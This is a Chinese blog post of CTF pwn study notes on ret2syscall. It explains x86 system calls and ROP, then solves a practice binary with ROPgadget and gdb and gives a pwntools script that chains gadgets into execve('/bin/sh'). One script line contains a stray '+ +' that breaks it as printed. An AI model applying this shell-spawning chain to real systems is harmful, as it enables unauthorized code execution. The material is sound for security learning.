网络攻防快速入门笔记pwn | 02 栈溢出题型 | 2.3 ret2syscall

原创 已于 2025-04-01 10:30:26 修改 · 983 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#笔记 #网络 #pwn

于 2025-04-01 10:24:39 首次发布

上一篇:网络攻防快速入门笔记pwn | 02 栈溢出题型 | 2.2 ret2libc

下一篇:格式化字符串漏洞(待更新)

欢迎关注~

ret2syscall

一、系统调用

(一)定义

系统调用是操作系统提供给应用程序的一种接口,允许应用程序请求操作系统执行特权指令,如文件操作、网络通信、进程管理等;
x86通过int 0x80指令进行系统调用、amd64通过syscall指令进行系统调用。

(二)特点

应用程序通常通过软终端或者指令触发系统调用
系统调用提供了用户空间程序与内核空间之间的交互方式
典型的系统调用包括read、write、open、close

系统调用的本质是操作系统内核的一段代码,我们自己编写的程序在Text、Data、Bss这些段中,然后这些程序载入内存之后,操作系统就会为我们创造Stack、Shared Libraries和Heap这些段,但是这些都是用户态的代码。
真正能接触到硬件的代码都是在地址空间的最高地址,就是Kernel空间
在这里插入图片描述

【例】write()函数是一个系统调用,它用于将数据从一个文件描述符写入文件或者其他输出设备中,以下是它的工作过程:(x86系统下)

# 向EAX寄存器中传入系统调用号,write函数的系统调用号就是0x4:
mov eax,0x4  
# 向EBX、ECX、EDX寄存器中传入write函数参数:
mov ebx,1   # 第一个参数
mov ecx,["Hello,World!\n"] # 第二个参数
mov edx,13 # 第三个参数
# 中断执行系统调用
int 0x80
# =》write(1,"Hello,World!\n",13)

【例】execve()函数
它是一个system函数包装的一种系统调用,系统调用号是11

# 向EAX寄存器中传入系统调用号,execve()函数的系统调用号就是0xb:
mov eax,0xb  
# 向EBX、ECX、EDX寄存器中传入execve()函数参数:
mov ebx,["/bin/sh"]   # 第一个参数
mov ecx,0 # 第二个参数
mov edx,0 # 第三个参数
# 中断执行系统调用
int 0x80
# =》execve("/bin/sh", 0, 0)

二、返回导向编程

(一)定义

ROP是一种漏洞利用技术,利用程序已有代码片段(即gadgets)来构建攻击payload,而不是注入新的代码。这对于执行非执行区域(NX)的内存非常有用。

(二)特点

利用程序中已有的代码片段,这些片段通常是函数的结尾,包含ret指令。
将这些片段链接在一起,形成攻击payload,用于执行恶意操作。
在这里插入图片描述

三、例题

链接: https://pan.baidu.com/s/1EYCSaq9oCV8dPDQBRb-_Yg 提取码: pfq8
拿到二进制文件之后,首先对二进制文件进行分析,是一个32位,没有设置canary保护,可以进行栈溢出。
在这里插入图片描述

用IDA打开二进制文件,得到代码:
在这里插入图片描述

shift+F12,得到字符串表,发现字符串表中有/bin/sh:
在这里插入图片描述
在这里插入图片描述

查找包含pop;ret命令的地址:
ROPgadget --binary ./code/pwn/ret2syscall/ret2syscall --only "pop|ret"
在这里插入图片描述
在这里插入图片描述

ROPgadget --binary ./code/pwn/ret2syscall/ret2syscall --only "int"
在这里插入图片描述

脚本:
需要注意的是,这里在栈上用到了很多pop;ret指令,可能会存在字节对齐的问题,所以偏移量可能会比代码里观察的要大,最保险的办法就是直接用gdb进行调试

from pwn import *
p = process("./code/pwn/ret2syscall/ret2syscall")
bin_sh = 0x080be408
int_addr = 0x08049421
pop_eax = 0x080bb196
pop_edx_ecx_ebx = 0x0806eb90

padding = 112
payload = b'a'*padding+p32(pop_eax)+p32(0xb)
payload = payload+p32(pop_edx_ecx_ebx)+p32(0)+p32(0)+p32(bin_sh)
payload = payload + +p32(int_addr)

p.sendline(payload)
p.interactive()

本地运行:
在这里插入图片描述

调试得到偏移量的过程:

  1. gdb ./ret2syscall 进入二进制文件调试

  2. b main 在main函数处设置断点:

  3. r 继续执行到断点处

  4. cyclic 200 生成200个随机填充字符

  5. continue 继续执行代码,并将随机生成的字符复制进去,程序到达断点:

  6. cyclic -l daab得到偏移量

得到偏移量为112

PWN基础-ROP技术-ret2syscall突破NX保护
Welcome To Myon'Blog !
05-07 406
我们 ret2syscall 实际还是希望调用 execve,和 ret2shellcode 类似,只是多了堆栈不可执行。后面我们会继续发送内容(/bin/sh)给 read 函数,读取到 bss_addr。我们继续调用 execve,其 32 位系统调用号是 11,即 0xb。没有找到,因此我们后面需要手动将 /bin/sh 写到 bss 段。我们先系统调用 read,其 32 位系统调用号是 3,即 0x3。接下来我们找 /bin/sh 字符串的地址。32 位程序,小端序,开启了 NX 保护。
PWN基础-ROP技术-ret2syscall-64位程序栈溢出利用
Welcome To Myon'Blog !
05-08 432
后面传两个参数就可以了,分开写,一起写都可以的,这里就不做过多演示了。前置 ret2syscall 的基础我们就不做过多讲解了。execve 系统调用号是 59,也就是 0x3b。ida 看一下 main 函数,存在明显的栈溢出。看到有两个连一起的,当然我们也可以一个一个地传参。而 64 位系统调用最后是执行 syscall32 位系统调用最后是执行 int x080。我们这里只用到前三个就可以了,以及 rax。这里看到的这个不对,因为后面没有 ret。正确的应该是 0x45BAC5。
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3851
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
pwn学习笔记3ret2syscall
qq_66013948的博客
02-13 1035
​ ROP(Return Oriented Programming)返回导向编程,主要思想是通过在程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。
[pwn]ROP:灵活运用syscall
热门推荐
Breeze的博客
08-26 1万+
灵活运用syscall 遇到了一个程序并不复杂,但利用却很麻烦的题目,Recho题目详细writeup,题目地址:Recho 按照惯例,查看安全策略: 基本没啥安全策略,然后查看程序逻辑,程序很短,就一个main: 很容易就找到溢出点,大体逻辑就是,先输入一个数,小于15会被认为是16,然后再输入一串字符串,程序会将前x(刚输入的数字)个字符拷贝到buf中,这里没有上限,所以存在溢出。但问题是...
pwn练习1-ret2syscall(ROP-gadget)
m0_51756263的博客
10-07 1791
pwn练习1-ret2syscall(ROP-gadget)
PWN入门(三)——ret2text /ret2syscall /ret2shellcode
Jack_Grealish的博客
11-10 1512
根据目录看文章结构,优快云中没有Typora那么多级标题,所以有点乱。
网络攻防快速入门笔记pwn | 02 栈溢出题型 | 2.1 ret2text和ret2shellcode
qq_41040989的博客
03-31 961
将返回地址覆盖为程序.text段中已有代码的地址,从而执行本身的代码,由于我们要获得shell,二进制文件中本身就含有一个可以直接获取权限的函数,然后我们通过栈溢出漏洞,控制程序执行留,将返回地址覆盖为这个函数的地址让文件运行这个获取权限的函数,我们就可以拿到权限,进而获取flag。程序会把栈的地址输出,然后我们接收程序输出的栈地址,然后向栈中输入shellcode,通过栈溢出跳到输入shellcode的位置,最终获取shell。获取到系统权限之后,就可以输入相应的linux命令,一般用到。
网络攻防快速入门笔记pwn|01 Pwn栈溢出基础
qq_41040989的博客
03-31 792
⚫ 定义:根据程序漏洞,编写利用脚本破解漏洞,获得系统权限,从而获得flag。⚫ 一般解题思路:①出题人给出自己服务器的IP和端口,并在端口上运行一个进程② 出题人再给出一个二进制文件,这个二进制文件刚好就是这个进程运行的文件③我们通过找出出题人提供的二进制文件的漏洞;④ 利用漏洞获取出题人服务器的最高权限;
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
网络安全领域,特别是针对Pwn(破解)类竞赛,"jmp_rsp"是一个常见的技术概念,主要涉及栈溢出漏洞的利用。广东大学生网络攻防大赛中的这个“jmp_rsp”题目显然是设计来测试参赛者对这类漏洞的理解和利用能力。...
CTFshow-PWN-栈溢出pwn49)两种方法+动调分析
最新发布
Welcome To Myon'Blog !
06-09 1309
执行后,可以看到 0x80da000 往后部分为可读可写可执行权限。看似开了 canary 保护,实际没有,是 checksec 版本太老了,检测到 __stack_chk_fail 函数就算开了。看似和上一题一模一样,但是细心的小朋友应该注意到了,左边多出了很多函数,说明这个程序是静态链接的,静态链接就意味着没法去打 ret2libc了,还是无 system 无 /bin/sh,考虑打 ret2syscall
字符串溢出(pwn溢出)--ret2syscall
莫慌的博客
09-29 943
pwn入门
PWN · ret2syscall】[Wiki] ret2syscall
Mr_Fmnwon的博客
05-06 3308
虽然网上(包括优快云)有很多ret2syscall的例题,但大多是Wiki,且摘自官方题解蒟蒻想从自己的“碰南墙“的历程出发,以蒟蒻萌新的视角,述说蒟蒻萌新的新路历程~~
pwn基本ROP——ret2syscall
turtlesd的博客
04-25 2975
ret2syscall环境原理系统调用利用方式漏洞分析使用`checksec`指令查看程序保护措施使用IDE32位进行调试payload 环境 ret2syscall 原理 系统调用 系统调用(英语:system call),指运行在用户空间的程序向操作系统内核请求需要更高权限运行的服务。 操作系统的进程空间可分为用户空间和内核空间,它们需要不同的执行权限。其中系统调用运行在内核空间。 应用程序调用系统调用的过程是: 1、把系统调用的编号存入 EAX; 1、把函数参数存入其它通用寄存器; 3、触发 0x80
PWN:手动编写 x64 基于syscall 的 shell code(TODO)
weixin_59166557的博客
11-19 803
在AMD64架构(也称为x86-64或x64)下,使用syscallRAXRDIRSIRDXR10R8R9RAXsyscallsyscallRAXRCXR11syscall
Pwn学习-ret2syscall
cdl10000的博客
11-04 168
M1调pwn环境太难了,新手学pwn中。一路踩坑,一路学。
ret2syscallpwn第二课)
s5555555___的博客
02-20 1896
xo.01 ret2syscall原理ret2syscall,即通过ROP控制程序执行系统调用,获取 shell。xo.02 ROP原理:随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是所谓 gadgets 就是以 ret 结尾的指令序列。例如:pop eax;ret这段代码的作用就是将。
pwn ret2syscall
young‘s blog
02-11 1043
学了学pwndbg的使用,文章在这里:gdb+pwndbg食用指南 这篇博客注定是一篇水文,因为昨天做了做XCTF攻防世界上的题目,基础题都做不来,那题应该是ret2text的内容,还是太菜,没有深刻理解原理,导致做不出,对于ret2syscall现在理解的不深刻,在这里记录一下是怎么做的吧,原理懂了再补上。 查看一下文件的基本信息 32位静态链接的程序,开启了NX保护。 由于是静态链接的,所以我...
NJUPT PWN入门:理解栈溢出原理与利用方法
栈溢出是计算机安全领域中一个重要的概念,尤其是在逆向工程(Pwn)中扮演着关键角色...同时,对于学习Pwn或逆向工程的人来说,掌握栈溢出的利用方法是入门阶段的重要挑战,也是进一步深入研究其他漏洞利用技术的基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李喵喵爱豆豆

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值